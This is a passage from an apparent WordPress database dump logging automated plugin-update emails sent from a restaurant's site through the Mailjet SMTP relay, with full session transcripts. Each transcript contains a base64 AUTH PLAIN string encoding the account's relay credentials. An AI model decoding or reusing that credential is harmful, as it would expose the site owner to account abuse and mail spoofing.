aggiornati all\'ultima versione:\n- Really Simple SSL (da versione 4.0.12 a 4.0.13)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58845,4646,'original_headers',''),(58846,4646,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <1241556fb8b0469e9ee0de5268aa1462@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Wed, 24 Mar 2021 12:44:11 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Really Simple SSL (da versio=\r\nne 4.0.12 a 4.0.13)=0A=0A=0ASe hai problemi di qualsiasi tipo o hai biso=\r\ngno di aiuto, i volontari dei forum di supporto su https://it.wordpress.=\r\norg/forums/ possono riuscire ad aiutarti.=0Ahttps://it.wordpress.org/sup=\r\nport/forums/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as 3950d629-46ff-464d-ba12-9f7602eb0442\r\n'),(58847,4647,'solution','All good, mail sent.'),(58848,4647,'success','1'),(58849,4647,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58850,4647,'to_header','webmaster@baldisserri.com'),(58851,4647,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58852,4647,'original_to','webmaster@baldisserri.com'),(58853,4647,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58854,4647,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue (da versione 3.1.7 a 3.1.8)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58855,4647,'original_headers',''),(58856,4647,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <670039751e5f19737985eaaf43b5639d@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Thu, 25 Mar 2021 13:13:13 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Newsletter, SMTP, Email mark=\r\neting and Subscribe forms by Sendinblue (da versione 3.1.7 a 3.1.8)=0A=\r\n=0A=0ASe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volont=\r\nari dei forum di supporto su https://it.wordpress.org/forums/ possono ri=\r\nuscire ad aiutarti.=0Ahttps://it.wordpress.org/support/forums/=0A=0AIl t=\r\neam di WordPress\r\n.\r\n250 OK queued as 6f48591c-447b-4662-ae5c-f257647ea7c5\r\n'),(58857,4648,'solution','All good, mail sent.'),(58858,4648,'success','1'),(58859,4648,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58860,4648,'to_header','webmaster@baldisserri.com'),(58861,4648,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58862,4648,'original_to','webmaster@baldisserri.com'),(58863,4648,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58864,4648,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue (da versione 3.1.8 a 3.1.9)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58865,4648,'original_headers',''),(58866,4648,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <dde8b5baa7c55f68be71108763f5fe22@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Sat, 27 Mar 2021 13:19:10 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Newsletter, SMTP, Email mark=\r\neting and Subscribe forms by Sendinblue (da versione 3.1.8 a 3.1.9)=0A=\r\n=0A=0ASe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volont=\r\nari dei forum di supporto su https://it.wordpress.org/forums/ possono ri=\r\nuscire ad aiutarti.=0Ahttps://it.wordpress.org/support/forums/=0A=0AIl t=\r\neam di WordPress\r\n.\r\n250 OK queued as 5a7e8bc0-9e6a-4e27-bb55-8dbd0caa14c8\r\n'),(20952,977,'_edit_lock','1591792810:2'),(20953,977,'_edit_last','2'),(20954,977,'_wp_page_template','default'),(20959,1003,'_edit_lock','1591795909:2'),(20960,1003,'_edit_last','2'),(20961,1003,'_wp_page_template','default'),(20962,1005,'_edit_lock','1591795813:2'),(20963,1005,'_edit_last','2'),(20964,1005,'_wp_page_template','default'),(20977,1009,'_edit_lock','1591796382:2'),(20978,1009,'_edit_last','2'),(20979,1009,'_wp_page_template','default'),(58867,4649,'solution','All good, mail sent.'),(58868,4649,'success','1'),(58869,4649,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58870,4649,'to_header','webmaster@baldisserri.com'),(58871,4649,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58872,4649,'original_to','webmaster@baldisserri.com'),(58873,4649,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58874,4649,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Popup Builder (da versione 3.78 a 3.79)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58875,4649,'original_headers',''),(58876,4649,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <c549cc19d0d3794307d7d25f5f0e7912@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Mon, 29 Mar 2021 14:45:08 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Popup Builder (da versione 3=\r\n..78 a 3.79)=0A=0A=0ASe hai problemi di qualsiasi tipo o hai bisogno di a=\r\niuto, i volontari dei forum di supporto su https://it.wordpress.org/foru=\r\nms/ possono riuscire ad aiutarti.=0Ahttps://it.wordpress.org/support/for=\r\nums/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as 01d4a337-b80d-4c21-afb3-9f87964a3c41\r\n'),(58877,4650,'solution','All good, mail sent.'),(58878,4650,'success','1'),(58879,4650,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58880,4650,'to_header','webmaster@baldisserri.com'),(58881,4650,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58882,4650,'original_to','webmaster@baldisserri.com'),(58883,4650,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58884,4650,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- UpdraftPlus - Backup/Ripristino (da versione 1.16.50 a 1.16.51)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58885,4650,'original_headers',''),(58886,4650,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <ce8c95dcf40b9423d82544a1927406bd@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Fri, 02 Apr 2021 00:44:42 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- UpdraftPlus - Backup/Riprist=\r\nino (da versione 1.16.50 a 1.16.51)=0A=0A=0ASe hai problemi di qualsiasi=\r\n tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https=\r\n://it.wordpress.org/forums/ possono riuscire ad aiutarti.=0Ahttps://it.w=\r\nordpress.org/support/forums/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as abc892f1-5ac4-4591-a55a-21c8f1ee9291\r\n'),(58887,4651,'solution','All good, mail sent.'),(58888,4651,'success','1'),(58889,4651,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58890,4651,'to_header','webmaster@baldisserri.com'),(58891,4651,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58892,4651,'original_to','webmaster@baldisserri.com'),(58893,4651,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58894,4651,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- UpdraftPlus - Backup/Ripristino (da versione 1.16.51 a 1.16.53)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58895,4651,'original_headers',''),(58896,4651,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <db46f07f8110e95196f4600547fb2c4b@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Sun, 04 Apr 2021 02:34:39 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- UpdraftPlus - Backup/Riprist=\r\nino (da versione 1.16.51 a 1.16.53)=0A=0A=0ASe hai problemi di qualsiasi=\r\n tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https=\r\n://it.wordpress.org/forums/ possono riuscire ad aiutarti.=0Ahttps://it.w=\r\nordpress.org/support/forums/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as a0cdacbb-0590-4cfc-86fd-3c834bc5e96c\r\n'),(58897,4652,'solution','All good, mail sent.'),(58898,4652,'success','1'),(58899,4652,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58900,4652,'to_header','webmaster@baldisserri.com'),(58901,4652,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58902,4652,'original_to','webmaster@baldisserri.com'),(58903,4652,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58904,4652,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Mailjet for WordPress (da versione 5.2.5 a 5.2.6)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58905,4652,'original_headers',''),(58906,4652,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <f8941fb342ba16e49868225421f6b35d@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Tue, 06 Apr 2021 01:45:22 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Mailjet for WordPress (da ve=\r\nrsione 5.2.5 a 5.2.6)=0A=0A=0ASe hai problemi di qualsiasi tipo o hai bi=\r\nsogno di aiuto, i volontari dei forum di supporto su https://it.wordpres=\r\ns.org/forums/ possono riuscire ad aiutarti.=0Ahttps://it.wordpress.org/s=\r\nupport/forums/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as b5d549c4-bf4d-48f8-9f62-dc42681a440a\r\n'),(58907,4653,'solution','All good, mail sent.'),(58908,4653,'success','1'),(58909,4653,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58910,4653,'to_header','webmaster@baldisserri.com'),(58911,4653,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58912,4653,'original_to','webmaster@baldisserri.com'),(58913,4653,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58914,4653,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Popup Builder (da versione 3.79 a 3.81)\n- Yoast SEO (da versione 16.0.2 a 16.1)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58915,4653,'original_headers',''),(58916,4653,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: 